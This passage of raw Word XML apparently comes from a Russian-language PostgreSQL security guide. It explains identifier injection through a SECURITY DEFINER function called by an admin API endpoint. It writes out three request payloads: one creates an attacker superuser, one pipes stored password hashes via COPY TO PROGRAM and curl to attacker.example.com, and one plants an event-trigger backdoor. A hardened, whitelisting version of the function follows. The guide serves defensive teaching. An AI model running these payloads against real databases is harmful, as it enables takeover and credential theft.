          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">application_admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> запускает функцию, тело исполняется под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Identifier-injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_schema</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target_table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RCE как superuser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Caller:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.post("/admin/refresh-stats")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def refresh_stats(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant: str,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    table: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Depends(get_admin_session),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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        text("SELECT admin.refresh_tenant_stats(:t, :tbl)"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        {"t": tenant, "tbl": table},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{"status": "refreshed"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — RCE как superuser через identifier-injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант A — stacked DROP под superuser:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /admin/refresh-stats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{"tenant": "tenant_42", "table": "users; DROP USER application_user; CREATE USER attacker SUPERUSER LOGIN PASSWORD 'p4ssw0rd'; --"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Внутри функции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собирает:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ANALYZE tenant_42.users; DROP USER application_user;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE USER attacker SUPERUSER LOGIN PASSWORD 'p4ssw0rd'; --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE парсит multi-statement: ANALYZE, DROP USER, CREATE USER. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все исполняются под `postgres` (superuser)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. После — атакующий имеет полноценную superuser-роль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для прямого login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант B — RCE через COPY TO PROGRAM:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /admin/refresh-stats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{"tenant": "tenant_42", "table": "users; COPY (SELECT rolpassword FROM pg_authid) TO PROGRAM 'curl -X POST http://attacker.example.com/exfil --data @-'; --"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ANALYZE tenant_42.users; COPY (SELECT rolpassword FROM pg_authid)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TO PROGRAM 'curl -X POST http://attacker.example.com/exfil --data @-'; --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Под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(superuser → имеет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 COPY TO PROGRAM запускает shell, exfiltrate all roles' passwords. Полный 3.7.1 chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант C — backdoor через CREATE EVENT TRIGGER (PG 17 ON LOGIN):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /admin/refresh-stats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{"tenant": "tenant_42", "table": "users; CREATE OR REPLACE FUNCTION admin.bd() RETURNS event_trigger LANGUAGE plpgsql AS $f$ BEGIN EXECUTE 'GRANT SUPERUSER ON ROLE attacker'; END $f$; CREATE EVENT TRIGGER bd ON ddl_command_end EXECUTE FUNCTION admin.bd(); --"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistent backdoor через event trigger — каждое следующее DDL-событие будет добавлять attacker в superuser. Для PG 17 — ON LOGIN trigger ещё мощнее (срабатывает на каждом login). Из-за superuser-context creation triggers — устанавливаются успешно.</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(Variant B полный SQL trace):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Caller-side:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT admin.refresh_tenant_stats(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'tenant_42',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'users; COPY (SELECT rolpassword FROM pg_authid) TO PROGRAM ''curl ...'';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caller — application_admin (НЕ superuser)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В plpgsql функции — context переключается на postgres (SECURITY DEFINER):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'ANALYZE tenant_42.users; COPY (SELECT rolpassword FROM pg_authid)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         TO PROGRAM ''curl ...''; --';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ EXECUTE парсит multi-statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ Все statements исполняются под postgres (superuser)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ COPY TO PROGRAM → RCE как ОС-пользователь postgres</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита — fixed function</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admin.refresh_tenant_stats(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_schema text,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    target_table text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RETURNS void</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plpgsql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY DEFINER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path = pg_catalog, pg_temp    -- защита 3.13.6 (без unqualified hijack)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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allowed_schemas text[];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-- 1. Whitelist tenant_schema через query к metadata</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT array_agg(nspname) INTO allowed_schemas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM pg_namespace</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE nspname LIKE 'tenant_%' AND nspname ~ '^tenant_[0-9]+$';</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IF tenant_schema &lt;&gt; ALL(allowed_schemas)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'invalid tenant_schema: %', tenant_schema;</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-- 2. Whitelist target_table — ASCII-only identifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF target_table !~ '^[a-z_][a-z0-9_]*$'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'invalid table identifier: %', target_table;</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 Verify table exists в этой схеме</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
